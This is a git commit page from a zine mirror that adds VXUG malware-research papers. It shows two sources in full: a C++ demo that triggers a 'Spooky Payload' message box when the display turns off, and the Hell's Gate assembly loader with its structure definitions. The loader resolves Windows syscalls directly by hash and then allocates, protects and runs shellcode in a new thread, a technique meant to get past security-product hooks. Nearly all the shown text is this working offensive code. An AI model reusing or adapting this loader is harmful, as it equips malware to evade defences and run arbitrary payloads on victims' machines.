mirror of
https://github.com/fdiskyou/Zines.git
synced 2025-03-09 00:00:00 +01:00
add github.com/vxunderground/VXUG-Papers
This commit is contained in:
parent
4b8cdca23c
commit
99f5f5831c
63 changed files with 11513 additions and 0 deletions
Binary file not shown.
91
VXUG-Papers/Abusing the Windows Power Management API/src.cpp
Normal file
91
VXUG-Papers/Abusing the Windows Power Management API/src.cpp
Normal file
|
@ -0,0 +1,91 @@
|
|||
#include <Windows.h>
|
||||
#include <powersetting.h>
|
||||
#include <powrprof.h>
|
||||
|
||||
#define WIN32_LEAN_AND_MEAN
|
||||
|
||||
typedef DWORD(WINAPI* POWERSETTINGREGISTERNOTIFICATION)(LPCGUID, DWORD, HANDLE, PHPOWERNOTIFY);
|
||||
typedef DWORD(WINAPI* POWERSETTINGUNREGISTERNOTIFICATION)(HPOWERNOTIFY);
|
||||
|
||||
ULONG CALLBACK HandlePowerNotifications(PVOID Context, ULONG Type, PVOID Setting);
|
||||
|
||||
int main(VOID)
|
||||
{
|
||||
DWORD dwError = ERROR_SUCCESS;
|
||||
HMODULE hLibrary;
|
||||
POWERSETTINGREGISTERNOTIFICATION _PowerSettingRegisterNotification = NULL;
|
||||
POWERSETTINGUNREGISTERNOTIFICATION _PowerSettingUnregisterNotification = NULL;
|
||||
DEVICE_NOTIFY_SUBSCRIBE_PARAMETERS NotificationsParameters;
|
||||
HANDLE hNotificationRegister = NULL;
|
||||
|
||||
hLibrary = LoadLibrary(L"powrprof.dll");
|
||||
if (hLibrary == NULL)
|
||||
goto FAILURE;
|
||||
|
||||
_PowerSettingRegisterNotification = (POWERSETTINGREGISTERNOTIFICATION)GetProcAddress(hLibrary, "PowerSettingRegisterNotification");
|
||||
_PowerSettingUnregisterNotification = (POWERSETTINGUNREGISTERNOTIFICATION)GetProcAddress(hLibrary, "PowerSettingUnregisterNotification");
|
||||
|
||||
if (!_PowerSettingRegisterNotification || !_PowerSettingUnregisterNotification)
|
||||
goto FAILURE;
|
||||
|
||||
NotificationsParameters.Callback = HandlePowerNotifications;
|
||||
NotificationsParameters.Context = NULL;
|
||||
|
||||
if (_PowerSettingRegisterNotification(&GUID_CONSOLE_DISPLAY_STATE, DEVICE_NOTIFY_CALLBACK,
|
||||
(HANDLE)&NotificationsParameters, &hNotificationRegister) != ERROR_SUCCESS)
|
||||
{
|
||||
goto FAILURE;
|
||||
}
|
||||
|
||||
if (SetThreadExecutionState(ES_AWAYMODE_REQUIRED | ES_CONTINUOUS | ES_SYSTEM_REQUIRED) == NULL)
|
||||
goto FAILURE;
|
||||
|
||||
while (1){ Sleep(100); }
|
||||
|
||||
if (hNotificationRegister)
|
||||
_PowerSettingUnregisterNotification(hNotificationRegister);
|
||||
|
||||
return ERROR_SUCCESS;
|
||||
|
||||
FAILURE:
|
||||
|
||||
dwError = GetLastError();
|
||||
|
||||
if (hNotificationRegister)
|
||||
_PowerSettingUnregisterNotification(hNotificationRegister);
|
||||
|
||||
return dwError;
|
||||
|
||||
}
|
||||
|
||||
ULONG CALLBACK HandlePowerNotifications(PVOID Context, ULONG Type, PVOID Setting)
|
||||
{
|
||||
PPOWERBROADCAST_SETTING PowerSettings = (PPOWERBROADCAST_SETTING)Setting;
|
||||
|
||||
if (Type == PBT_POWERSETTINGCHANGE && PowerSettings->PowerSetting == GUID_CONSOLE_DISPLAY_STATE)
|
||||
{
|
||||
switch (*PowerSettings->Data)
|
||||
{
|
||||
case 0x0:
|
||||
case 0x2:
|
||||
{
|
||||
Sleep(10000);
|
||||
MessageBoxW(NULL, L"Spooky Payload", L"", MB_OK);
|
||||
break;
|
||||
}
|
||||
|
||||
case 0x1:
|
||||
{
|
||||
Sleep(1);
|
||||
break;
|
||||
}
|
||||
|
||||
default:
|
||||
{
|
||||
break;
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
return ERROR_SUCCESS;
|
||||
}
|
BIN
VXUG-Papers/An Alternative Method To Enumerate Processes.pdf
Normal file
BIN
VXUG-Papers/An Alternative Method To Enumerate Processes.pdf
Normal file
Binary file not shown.
BIN
VXUG-Papers/From a C project through assembly to shellcode.pdf
Normal file
BIN
VXUG-Papers/From a C project through assembly to shellcode.pdf
Normal file
Binary file not shown.
262
VXUG-Papers/Hells Gate/Assembly Expansion/HELLSGATE.ASM
Normal file
262
VXUG-Papers/Hells Gate/Assembly Expansion/HELLSGATE.ASM
Normal file
|
@ -0,0 +1,262 @@
|
|||
; @file HELLSGATE.ASM
|
||||
; @data 07-08-2020
|
||||
; @author Paul Laîné (@am0nsec)
|
||||
; @version 1.0
|
||||
; @brief Dynamically extracting and invoking syscalls from in-memory modules.
|
||||
; @details
|
||||
; @link https://ntamonsec.blogspot.com/
|
||||
; @copyright This project has been released under the GNU Public License v3 license.
|
||||
|
||||
include HELLSGATE.INC
|
||||
|
||||
_DATA segment
|
||||
extern Shellcode: BYTE
|
||||
extern ShellcodeLength: QWORD
|
||||
|
||||
wSystemCall DWORD 000h
|
||||
lpAddress QWORD ?
|
||||
sDataSize QWORD ?
|
||||
OldProtect QWORD ?
|
||||
hThreadHandle QWORD ?
|
||||
|
||||
VXTable VX_TABLE <>
|
||||
Timeout LARGE_INTEGER <>
|
||||
_DATA ends
|
||||
|
||||
_TEXT segment
|
||||
SystemCall PROC
|
||||
mov r10, rcx
|
||||
syscall
|
||||
ret
|
||||
SystemCall ENDP
|
||||
|
||||
HellsGate PROC
|
||||
_start:
|
||||
mov r8, gs:[60h] ; Get process environment block (PEB)
|
||||
cmp [r8].PEB.OSMajorVersion, 0Ah ;
|
||||
jne _failure ; Jump if not Windows 10
|
||||
|
||||
; Get the base address of ntdll
|
||||
mov r8, [r8].PEB.Ldr ;
|
||||
mov r8, [r8].PEB_LDR_DATA.InMemoryOrderModuleList.Flink - 10h ; First loaded module: e.g. hellsgate.exe
|
||||
mov r8, [r8].LDR_DATA_TABLE_ENTRY.InMemoryOrderLinks.Flink - 10h ; Second loaded module: e.g. ntdll.dll
|
||||
mov r8, [r8].LDR_DATA_TABLE_ENTRY.DllBase ; Image base of the module
|
||||
mov r9, r8 ; Store for later use
|
||||
|
||||
; Get module export directory
|
||||
cmp [r8].IMAGE_DOS_HEADER.e_magic, 5A4Dh ; DOS Header --> MZ
|
||||
jne _failure ;
|
||||
|
||||
mov ebx, [r8].IMAGE_DOS_HEADER.e_lfanew ; RVA of IMAGE_NT_HEADERS64
|
||||
add r8, rbx ;
|
||||
cmp [r8].IMAGE_NT_HEADERS64.Signature, 00004550h ; NT Header --> PE00
|
||||
jne _failure ;
|
||||
|
||||
mov ebx, IMAGE_NT_HEADERS64.OptionalHeader ; RVA of IMAGE_OPTIONAL_HEADER64
|
||||
add r8, rbx ;
|
||||
cmp [r8].IMAGE_OPTIONAL_HEADER64.Magic, 20bh ; Optional header --> 0x20b
|
||||
jne _failure ;
|
||||
|
||||
lea r8, [r8].IMAGE_OPTIONAL_HEADER64.DataDirectory ; First entry of the DataDirectory array
|
||||
mov ebx, [r8].IMAGE_DATA_DIRECTORY.VirtualAddress ; RVA of IMAGE_EXPORT_DIRECTORY
|
||||
mov r8, r9 ; ImageBase
|
||||
add r8, rbx ; Module + RVA
|
||||
|
||||
; Push function hashes
|
||||
mov VXTable.NtAllocateVirtualMemory.dwHash, 002B73D648h ; DJB2 hash of NtAllocateVirtualMemory
|
||||
mov VXTable.NtProtectVirtualMemory.dwHash, 00FE950644h ; DJB2 hash of NtProtectVirtualMemory
|
||||
mov VXTable.NtCreateThreadEx.dwHash, 00B151D7ACh ; DJB2 hash of NtCreateThreadEx
|
||||
mov VXTable.NtWaitForSingleObject.dwHash, 0091F4EA38h ; DJB2 hash of NtWaitForSingleObject
|
||||
|
||||
xor r15, r15 ; Clean R15 register
|
||||
mov r15b, 4h ; Move to R15 number of functions to find
|
||||
|
||||
mov ebx, [r8].IMAGE_EXPORT_DIRECTORY.AddressOfNames ; Address of the function name
|
||||
mov r12, r9 ; Function name RVA
|
||||
add r12, rbx ; ImageBase + RVA
|
||||
|
||||
mov ebx, [r8].IMAGE_EXPORT_DIRECTORY.AddressOfFunctions ; Address of function pointers
|
||||
mov r13, r9 ;
|
||||
add r13, rbx ;
|
||||
|
||||
mov ebx, [r8].IMAGE_EXPORT_DIRECTORY.AddressOfNameOrdinals ; Address of function ordinals
|
||||
mov r14, r9 ;
|
||||
add r14, rbx ;
|
||||
|
||||
mov ecx, [r8].IMAGE_EXPORT_DIRECTORY.NumberOfNames ; Total number of named functions
|
||||
dec ecx
|
||||
|
||||
;-----------------------------------------------------------------------------
|
||||
; Find function ordinal index w/ function name hash
|
||||
;-----------------------------------------------------------------------------
|
||||
_parse_functions_name:
|
||||
mov rbx, 4h ; sizeof(DWORD)
|
||||
imul rbx, rcx ; siezof(DWORD) * RCX
|
||||
mov esi, [r12 + rbx] ; Function RVA
|
||||
add rsi, r9 ; Function RVA + ImageBase
|
||||
|
||||
mov r10d, 5381h ; hash = 0x5381
|
||||
_djb2:
|
||||
mov r11d, r10d ; Store original hash value for later
|
||||
shl r10d, 5 ; hash << 5
|
||||
add r10d, r11d ; (hash << 5) + hash
|
||||
|
||||
xor r11d, r11d ; Clean temporary hash value
|
||||
mov r11b, byte ptr [rsi] ; Get ASCII char
|
||||
add r10d, r11d ; ((hash << 5) + hash) + char
|
||||
|
||||
inc rsi ; Next string char
|
||||
cmp byte ptr [rsi], 00h ; End of string
|
||||
jne _djb2 ;
|
||||
|
||||
lea rax, VXTable ; Address of VX table
|
||||
mov rdx, VXTableEntrySize ; RDX = sizeof(VX_TABLE_ENTRY)
|
||||
imul rdx, r15 ; RDX = sizeof(VX_TABLE_ENTRY) * R15
|
||||
sub rdx, 10h ; RDX = (sizeof(VX_TABLE_ENTRY) * R15) - sizeof(VX_TABLE_ENTRY)
|
||||
add rax, rdx ; RAX = VX_TABLE[RDX].pAddress = RBX
|
||||
xor r10d, [rax].VX_TABLE_ENTRY.dwHash ; Check if function has been found
|
||||
jz _get_function_address ;
|
||||
loop _parse_functions_name ;
|
||||
|
||||
;-----------------------------------------------------------------------------
|
||||
; Find the function address w/ function ordinal
|
||||
;-----------------------------------------------------------------------------
|
||||
_get_function_address:
|
||||
mov rax, 2h ; sizeof(WORD)
|
||||
imul rax, rcx ; sizeof(WORD) * RCX
|
||||
mov ax, [r14 + rax] ; AX = function ordinal
|
||||
|
||||
imul rax, 4 ; sizeof(DWORD) * ordinal
|
||||
mov eax, [r13 + rax] ; RVA of function
|
||||
mov rbx, r9 ; RBX = ImageBase
|
||||
add rbx, rax ; RBX = address of function
|
||||
|
||||
lea rax, VXTable ; Address of VX table
|
||||
mov rdx, VXTableEntrySize ; RDX = sizeof(VX_TABLE_ENTRY)
|
||||
imul rdx, r15 ; RDX = sizeof(VX_TABLE_ENTRY) * R15
|
||||
sub rdx, 10h ; RDX = (sizeof(VX_TABLE_ENTRY) * R15) - sizeof(VX_TABLE_ENTRY)
|
||||
add rax, rdx ; RAX = VX_TABLE[RDX].pAddress = RBX
|
||||
mov [rax].VX_TABLE_ENTRY.pAddress, rbx ;
|
||||
|
||||
;-----------------------------------------------------------------------------
|
||||
; Find the function system call w/ function address
|
||||
;-----------------------------------------------------------------------------
|
||||
_get_function_syscall:
|
||||
inc rbx
|
||||
cmp byte ptr [rbx], 00C3h ; Check if RET
|
||||
je _failure ;
|
||||
|
||||
cmp word ptr [rbx], 050Fh ; Check if syscall
|
||||
jne _get_function_syscall ;
|
||||
|
||||
sub rbx, 0Eh ; Address of system call
|
||||
mov cx, word ptr [rbx] ; CX = system call
|
||||
|
||||
lea rax, VXTable ; Address of VX table
|
||||
mov rdx, VXTableEntrySize ; RDX = sizeof(VX_TABLE_ENTRY)
|
||||
imul rdx, r15 ; RDX = sizeof(VX_TABLE_ENTRY) * R15
|
||||
sub rdx, 10h ; RDX = (sizeof(VX_TABLE_ENTRY) * R15) - sizeof(VX_TABLE_ENTRY)
|
||||
add rax, rdx ; RAX = VX_TABLE[RDX].pAddress = RBX
|
||||
mov [rax].VX_TABLE_ENTRY.wSystemCall, cx ;
|
||||
|
||||
_reset_loop:
|
||||
; Move to the next function
|
||||
mov ecx, [r8].IMAGE_EXPORT_DIRECTORY.NumberOfNames ; Reset counter
|
||||
dec ecx ;
|
||||
dec r15 ; Check if all function have been found
|
||||
jnz _parse_functions_name ;
|
||||
|
||||
;-----------------------------------------------------------------------------
|
||||
; Execute the payload
|
||||
;-----------------------------------------------------------------------------
|
||||
_payload:
|
||||
; Initialise variables
|
||||
mov r10, ShellcodeLength ;
|
||||
mov sDataSize, r10 ; Store shellcode length
|
||||
mov lpAddress, 0h ;
|
||||
|
||||
; Execute NtAllocateVirtualMemory
|
||||
mov ax, VXTable.NtAllocateVirtualMemory.wSystemCall ;
|
||||
mov rcx, 0FFFFFFFFFFFFFFFFh ; ProcessHandle
|
||||
lea rdx, lpAddress ; BaseAddress
|
||||
xor r8, r8 ; ZeroBits
|
||||
lea r9, sDataSize ; RegionSize
|
||||
mov qword ptr [rsp + 20h], 3000h ; AllocationType
|
||||
mov qword ptr [rsp + 28h], 4 ; Protect
|
||||
|
||||
call SystemCall ;
|
||||
cmp eax, 00h ; (NTSTATUS != 0)
|
||||
jne _failure ;
|
||||
|
||||
; Copy shellcode
|
||||
cld ; Clear direction flag == forward copy
|
||||
lea rsi, Shellcode ; Origin
|
||||
mov rdi, lpAddress ; Destination
|
||||
mov rcx, ShellcodeLength ; Size of shellcode
|
||||
rep movsb ; Copy byte until RCX = 0
|
||||
|
||||
; Execute NtProtectVirtualMemory
|
||||
mov ax, VXTable.NtProtectVirtualMemory.wSystemCall ;
|
||||
mov rcx, 0FFFFFFFFFFFFFFFFh ; ProcessHandle
|
||||
lea rdx, lpAddress ; BaseAddress
|
||||
lea r8, sDataSize ; NumberOfBytesToProtect
|
||||
mov r9d, 20h ; NewAccessProtection
|
||||
|
||||
mov OldProtect, 00h ;
|
||||
lea r11, OldProtect ;
|
||||
mov qword ptr [rsp + 20h], r11 ; OldAccessProtection
|
||||
|
||||
call SystemCall ;
|
||||
cmp eax, 00h ; (NTSTATUS != 0)
|
||||
jne _failure ;
|
||||
|
||||
; Execute NtCreateThreadEx
|
||||
mov ax, VXTable.NtCreateThreadEx.wSystemCall
|
||||
mov hThreadHandle, 0 ;
|
||||
lea rcx, hThreadHandle ; hThread
|
||||
mov rdx, 1FFFFFh ; DesiredAccess
|
||||
xor r8, r8 ; ObjectAttributes
|
||||
mov r9, 0FFFFFFFFFFFFFFFFh ; ProcessHandle
|
||||
mov r10, lpAddress ;
|
||||
mov qword ptr [rsp + 20h], r10 ; lpStartAddress
|
||||
mov qword ptr [rsp + 28h], 00h ; lpParameter
|
||||
mov qword ptr [rsp + 30h], 00h ; Flags
|
||||
mov qword ptr [rsp + 38h], 00h ; StackZeroBits
|
||||
mov qword ptr [rsp + 40h], 00h ; SizeOfStackCommit
|
||||
mov qword ptr [rsp + 48h], 00h ; SizeOfStackReserve
|
||||
mov qword ptr [rsp + 50h], 00h ; lpBytesBuffer
|
||||
|
||||
call SystemCall ;
|
||||
cmp eax, 00h ; (NTSTATUS != 0)
|
||||
jne _failure ;
|
||||
|
||||
; Execute NtWaitForSingleObject
|
||||
mov ax, VXTable.NtWaitForSingleObject.wSystemCall ;
|
||||
mov rcx, hThreadHandle ; ObjectHandle
|
||||
xor rdx, rdx ; Alertable
|
||||
|
||||
mov Timeout, 0FFFFFFFFFF676980h ; TimeOut
|
||||
lea r8, Timeout ;
|
||||
|
||||
call SystemCall ;
|
||||
cmp eax, 00h ; (NTSTATUS != 0)
|
||||
jne _failure ;
|
||||
|
||||
;-----------------------------------------------------------------------------
|
||||
; Successfully execution of the function
|
||||
;-----------------------------------------------------------------------------
|
||||
_success:
|
||||
mov rax, 1
|
||||
ret
|
||||
|
||||
;-----------------------------------------------------------------------------
|
||||
; In case something goes wrong
|
||||
;-----------------------------------------------------------------------------
|
||||
_failure:
|
||||
xor rax, rax
|
||||
ret
|
||||
HellsGate ENDP
|
||||
_TEXT ends
|
||||
|
||||
; end of file
|
||||
end
|
285
VXUG-Papers/Hells Gate/Assembly Expansion/HELLSGATE.INC
Normal file
285
VXUG-Papers/Hells Gate/Assembly Expansion/HELLSGATE.INC
Normal file
|
@ -0,0 +1,285 @@
|
|||
; @file HELLSGATE.INC
|
||||
; @data 07-08-2020
|
||||
; @author Paul Laîné (@am0nsec)
|
||||
; @version 1.0
|
||||
; @brief Dynamically extracting and invoking syscalls from in-memory modules.
|
||||
; @details
|
||||
; @link https://ntamonsec.blogspot.com/
|
||||
; @copyright This project has been released under the GNU Public License v3 license.
|
||||
|
||||
VXTableEntrySize EQU SIZEOF VX_TABLE_ENTRY
|
||||
VXTableSize EQU SIZEOF VX_TABLE
|
||||
|
||||
VX_TABLE_ENTRY struct
|
||||
pAddress QWORD ? ; 0x0000
|
||||
dwHash DWORD ? ; 0x0008
|
||||
wSystemCall WORD ? ; 0x000C
|
||||
BYTE 2 dup(?) ; padding
|
||||
VX_TABLE_ENTRY ends
|
||||
|
||||
VX_TABLE struct
|
||||
NtAllocateVirtualMemory VX_TABLE_ENTRY <> ; 0x0000
|
||||
NtProtectVirtualMemory VX_TABLE_ENTRY <> ; 0x0010
|
||||
NtCreateThreadEx VX_TABLE_ENTRY <> ; 0x0020
|
||||
NtWaitForSingleObject VX_TABLE_ENTRY <> ; 0x0030
|
||||
VX_TABLE ends
|
||||
|
||||
LARGE_INTEGER struct
|
||||
LowPart DWORD ? ; 0x0000
|
||||
HighPart DWORD ? ; 0x0004
|
||||
LARGE_INTEGER ends
|
||||
|
||||
ULARGE_INTEGER struct
|
||||
LowPart DWORD ? ; 0x0000
|
||||
HighPart DWORD ? ; 0x0004
|
||||
ULARGE_INTEGER ends
|
||||
|
||||
UNICODE_STRING struct
|
||||
_Length WORD ? ; 0x0000
|
||||
MaximumLength WORD ? ; 0x0002
|
||||
BYTE 4 dup(?) ; padding
|
||||
Buffer QWORD ? ; 0x0008
|
||||
UNICODE_STRING ends
|
||||
|
||||
LIST_ENTRY struct
|
||||
Flink QWORD ? ; 0x0000
|
||||
BLink QWORD ? ; 0x0008
|
||||
LIST_ENTRY ends
|
||||
|
||||
PEB struct
|
||||
InheritedAddressSpace BYTE ? ; 0x0000
|
||||
ReadImageFileExecOptions BYTE ? ; 0x0001
|
||||
BeingDebugged BYTE ? ; 0x0002
|
||||
BitField BYTE ? ; 0x0003
|
||||
Padding0 BYTE 4 dup(?) ; 0x0004
|
||||
Mutant QWORD ? ; 0x0008
|
||||
ImageBaseAddress QWORD ? ; 0x0010
|
||||
Ldr QWORD ? ; 0x0018
|
||||
ProcessParameters QWORD ? ; 0x0020
|
||||
SubSystemData QWORD ? ; 0x0028
|
||||
ProcessHeap QWORD ? ; 0x0030
|
||||
FastPebLock QWORD ? ; 0x0038
|
||||
AtlThunkSListPtr QWORD ? ; 0x0040
|
||||
IFEOKey QWORD ? ; 0x0048
|
||||
CrossProcessFlags DWORD ? ; 0x0050
|
||||
Padding1 BYTE 4 dup(?) ; 0x0054
|
||||
UserSharedInfoPtr QWORD ? ; 0x0058
|
||||
SystemReserved DWORD ? ; 0x0060
|
||||
AtlThunkSListPtr32 DWORD ? ; 0x0064
|
||||
ApiSetMap QWORD ? ; 0x0068
|
||||
TlsExpansionCounter DWORD ? ; 0x0070
|
||||
Padding2 BYTE 4 dup(?) ; 0x0074
|
||||
TlsBitmap QWORD ? ; 0x0078
|
||||
TlsBitmapBits DWORD 2 dup(?) ; 0x0080
|
||||
ReadOnlySharedMemoryBase QWORD ? ; 0x0088
|
||||
SharedData QWORD ? ; 0x0090
|
||||
ReadOnlyStaticServerData QWORD ? ; 0x0098
|
||||
AnsiCodePageData QWORD ? ; 0x00A0
|
||||
OemCodePageData QWORD ? ; 0x00A8
|
||||
UnicodeCaseTableData QWORD ? ; 0x00B0
|
||||
NumberOfProcessors DWORD ? ; 0x00B9
|
||||
NtGlobalFlag DWORD ? ; 0x00BC
|
||||
CriticalSectionTimeout LARGE_INTEGER <> ; 0x00C0
|
||||
HeapSegmentReserve QWORD ? ; 0x00C8
|
||||
HeapSegmentCommit QWORD ? ; 0x00D0
|
||||
HeapDeCommitTotalFreeThreshold QWORD ? ; 0x00D8
|
||||
HeapDeCommitFreeBlockThreshold QWORD ? ; 0x00E0
|
||||
NumberOfHeaps DWORD ? ; 0x00E8
|
||||
MaximumNumberOfHeaps DWORD ? ; 0x00EC
|
||||
ProcessHeaps QWORD ? ; 0x00F0
|
||||
GdiSharedHandleTable QWORD ? ; 0x00F8
|
||||
ProcessStarterHelper QWORD ? ; 0x0100
|
||||
GdiDCAttributeList DWORD ? ; 0x0108
|
||||
Padding3 BYTE 4 dup(?) ; 0x010C
|
||||
LoaderLock QWORD ? ; 0x0110
|
||||
OSMajorVersion DWORD ? ; 0x0118
|
||||
OSMinorVersion DWORD ? ; 0x011C
|
||||
OSBuildNumber WORD ? ; 0x0120
|
||||
OSCSDVersion WORD ? ; 0x0122
|
||||
OSPlatformId DWORD ? ; 0x0124
|
||||
ImageSubsystem DWORD ? ; 0x0128
|
||||
ImageSubsystemMajorVersion DWORD ? ; 0x012C
|
||||
ImageSubsystemMinorVersion DWORD ? ; 0x0130
|
||||
Padding4 BYTE 4 dup(?) ; 0x0134
|
||||
ActiveProcessAffinityMask QWORD ? ; 0x0138
|
||||
GdiHandleBuffer DWORD 60 dup(?) ; 0x0140
|
||||
PostProcessInitRoutine QWORD ? ; 0x0230
|
||||
TlsExpansionBitmap QWORD ? ; 0x0238
|
||||
TlsExpansionBitmapBits DWORD 32 dup(?) ; 0x0240
|
||||
SessionId DWORD ? ; 0x02C0
|
||||
Padding5 BYTE 4 dup(?) ; 0x02C4
|
||||
AppCompatFlags ULARGE_INTEGER <> ; 0x02C8
|
||||
AppCompatFlagsUser ULARGE_INTEGER <> ; 0x02D0
|
||||
pShimData QWORD ? ; 0x02D8
|
||||
AppCompatInfo QWORD ? ; 0x02E0
|
||||
CSDVersion UNICODE_STRING <> ; 0x02E8
|
||||
ActivationContextData QWORD ? ; 0x02F8
|
||||
ProcessAssemblyStorageMap QWORD ? ; 0x0300
|
||||
SystemDefaultActivationContextData QWORD ? ; 0x0308
|
||||
SystemAssemblyStorageMap QWORD ? ; 0x0310
|
||||
MinimumStackCommit QWORD ? ; 0x0318
|
||||
SparePointers QWORD 4 dup(?) ; 0x0320
|
||||
SpareUlongs DWORD 5 dup(?) ; 0x0340
|
||||
BYTE 4 dup(?)
|
||||
WerRegistrationData QWORD ? ; 0x0358
|
||||
WerShipAssertPtr QWORD ? ; 0x0360
|
||||
pUnused QWORD ? ; 0x0368
|
||||
pImageHeaderHash QWORD ? ; 0x0370
|
||||
TracingFlags DWORD ? ; 0x0378
|
||||
Padding6 BYTE 4 dup(?) ; 0x037c
|
||||
CsrServerReadOnlySharedMemoryBase QWORD ? ; 0x0380
|
||||
TppWorkerpListLock QWORD ? ; 0x0388
|
||||
TppWorkerpList LIST_ENTRY <> ; 0x0390
|
||||
WaitOnAddressHashTable QWORD 128 dup(?) ; 0x03A0
|
||||
TelemetryCoverageHeader QWORD ? ; 0x07A0
|
||||
CloudFileFlags DWORD ? ; 0x07A8
|
||||
CloudFileDiagFlags DWORD ? ; 0x07AC
|
||||
PlaceholderCompatibilityMode BYTE ? ; 0x07B0
|
||||
PlaceholderCompatibilityModeReserved BYTE 7 dup(?) ; 0x07B1
|
||||
LeapSecondData QWORD ? ; 0x07B8
|
||||
LeapSecondFlags DWORD ? ; 0x07c0
|
||||
NtGlobalFlag2 DWORD ? ; 0x07c4
|
||||
PEB ends
|
||||
|
||||
PEB_LDR_DATA struct
|
||||
_Length DWORD ? ; 0x0000
|
||||
Initialized BYTE ? ; 0x0004
|
||||
BYTE 3 dup(?) ; padding
|
||||
SsHandle QWORD ? ; 0x0008
|
||||
InLoadOrderModuleList LIST_ENTRY <> ; 0x0010
|
||||
InMemoryOrderModuleList LIST_ENTRY <> ; 0x0020
|
||||
InInitializationOrderModuleList LIST_ENTRY <> ; 0x0030
|
||||
EntryInProgress QWORD ? ; 0x0040
|
||||
ShutdownInProgress BYTE ? ; 0x0048
|
||||
BYTE 7 dup(?) ; padding
|
||||
ShutdownThreadId QWORD ? ; 0x0050
|
||||
PEB_LDR_DATA ends
|
||||
|
||||
RTL_BALANCED_NODE struct
|
||||
_Dummy BYTE 24 dup(?)
|
||||
RTL_BALANCED_NODE ends
|
||||
|
||||
LDR_DATA_TABLE_ENTRY struct
|
||||
InLoadOrderLinks LIST_ENTRY <> ; 0x0000
|
||||
InMemoryOrderLinks LIST_ENTRY <> ; 0x0010
|
||||
InInitializationOrderLinks LIST_ENTRY <> ; 0x0020
|
||||
DllBase QWORD ? ; 0x0030
|
||||
EntryPoint QWORD ? ; 0x0038
|
||||
SizeOfImage DWORD ? ; 0x0040
|
||||
BYTE 4 dup(?) ; padding
|
||||
FullDllName UNICODE_STRING <> ; 0x0048
|
||||
BaseDllName UNICODE_STRING <> ; 0x0058
|
||||
FlagGroup BYTE 4 dup(?) ; 0x0068
|
||||
ObsoleteLoadCount WORD ? ; 0x006C
|
||||
TlsIndex WORD ? ; 0x006E
|
||||
HashLinks LIST_ENTRY <> ; 0x0070
|
||||
TimeDateStamp DWORD ? ; 0x0080
|
||||
BYTE 4 dup(?) ; padding
|
||||
EntryPointActivationContext QWORD ? ; 0x0088
|
||||
_Lock QWORD ? ; 0x0090
|
||||
DdagNode QWORD ? ; 0x0098
|
||||
NodeModuleLink LIST_ENTRY <> ; 0x00A0
|
||||
LoadContext QWORD ? ; 0x00B0
|
||||
ParentDllBase QWORD ? ; 0x00B8
|
||||
SwitchBackContext QWORD ? ; 0x00C0
|
||||
BaseAddressIndexNode RTL_BALANCED_NODE <> ; 0x00C8
|
||||
MappingInfoIndexNode RTL_BALANCED_NODE <> ; 0x00E0
|
||||
OriginalBase QWORD ? ; 0x00F8
|
||||
LoadTime LARGE_INTEGER <> ; 0x0100
|
||||
BaseNameHashValue DWORD ? ; 0x0108
|
||||
LoadReason DWORD ? ; 0x010C
|
||||
ImplicitPathOptions DWORD ? ; 0x0110
|
||||
ReferenceCount DWORD ? ; 0x0114
|
||||
DependentLoadFlags DWORD ? ; 0x0118
|
||||
SigningLevel BYTE ? ; 0x011C
|
||||
LDR_DATA_TABLE_ENTRY ends
|
||||
|
||||
IMAGE_DOS_HEADER struct
|
||||
e_magic WORD ? ; 0x0000
|
||||
e_cblp WORD ? ; 0x0002
|
||||
e_cp WORD ? ; 0x0004
|
||||
e_crlc WORD ? ; 0x0006
|
||||
e_cparhdr WORD ? ; 0x0008
|
||||
e_minalloc WORD ? ; 0x000A
|
||||
e_maxalloc WORD ? ; 0x000C
|
||||
e_ss WORD ? ; 0x000E
|
||||
e_sp WORD ? ; 0x0010
|
||||
e_csum WORD ? ; 0x0012
|
||||
e_ip WORD ? ; 0x0014
|
||||
e_cs WORD ? ; 0x0016
|
||||
e_lfarlc WORD ? ; 0x0018
|
||||
e_ovno WORD ? ; 0x001A
|
||||
e_res WORD 4 dup(?) ; 0x001C
|
||||
e_oemid WORD ? ; 0x0024
|
||||
e_oeminfo WORD ? ; 0x0026
|
||||
e_res2 WORD 10 dup(?) ; 0x0028
|
||||
e_lfanew DWORD ? ; 0x003C
|
||||
IMAGE_DOS_HEADER ends
|
||||
|
||||
IMAGE_FILE_HEADER struct
|
||||
Machine WORD ? ; 0x0000
|
||||
NumberOfSections WORD ? ; 0x0002
|
||||
TimeDateStamp DWORD ? ; 0x0004
|
||||
PointerToSymbolTable DWORD ? ; 0x0008
|
||||
NumberOfSymbols DWORD ? ; 0x000c
|
||||
SizeOfOptionalHeader WORD ? ; 0x0010
|
||||
Characteristics WORD ? ; 0x0012
|
||||
IMAGE_FILE_HEADER ends
|
||||
|
||||
IMAGE_DATA_DIRECTORY struct
|
||||
VirtualAddress DWORD ? ; 0x0000
|
||||
_Size DWORD ? ; 0x0004
|
||||
IMAGE_DATA_DIRECTORY ends
|
||||
|
||||
IMAGE_OPTIONAL_HEADER64 struct
|
||||
Magic WORD ? ; 0x0000
|
||||
MajorLinkerVersion BYTE ? ; 0x0002
|
||||
MinorLinkerVersion BYTE ? ; 0x0003
|
||||
SizeOfCode DWORD ? ; 0x0004
|
||||
SizeOfInitializedData DWORD ? ; 0x0008
|
||||
SizeOfUninitializedData DWORD ? ; 0x000C
|
||||
AddressOfEntryPoint DWORD ? ; 0x0010
|
||||
BaseOfCode DWORD ? ; 0x0014
|
||||
ImageBase QWORD ? ; 0x0018
|
||||
SectionAlignment DWORD ? ; 0x0020
|
||||
FileAlignment DWORD ? ; 0x0024
|
||||
MajorOperatingSystemVersion WORD ? ; 0x0028
|
||||
MinorOperatingSystemVersion WORD ? ; 0x002a
|
||||
MajorImageVersion WORD ? ; 0x002C
|
||||
MinorImageVersion WORD ? ; 0x002E
|
||||
MajorSubsystemVersion WORD ? ; 0x0030
|
||||
MinorSubsystemVersion WORD ? ; 0x0032
|
||||
Win32VersionValue DWORD ? ; 0x0034
|
||||
SizeOfImage DWORD ? ; 0x0038
|
||||
SizeOfHeaders DWORD ? ; 0x003c
|
||||
CheckSum DWORD ? ; 0x0040
|
||||
Subsystem WORD ? ; 0x0044
|
||||
DllCharacteristics WORD ? ; 0x0046
|
||||
SizeOfStackReserve QWORD ? ; 0x0048
|
||||
SizeOfStackCommit QWORD ? ; 0x0050
|
||||
SizeOfHeapReserve QWORD ? ; 0x0058
|
||||
SizeOfHeapCommit QWORD ? ; 0x0060
|
||||
LoaderFlags DWORD ? ; 0x0068
|
||||
NumberOfRvaAndSizes DWORD ? ; 0x006C
|
||||
DataDirectory IMAGE_DATA_DIRECTORY 16 dup(<>) ; 0x0070
|
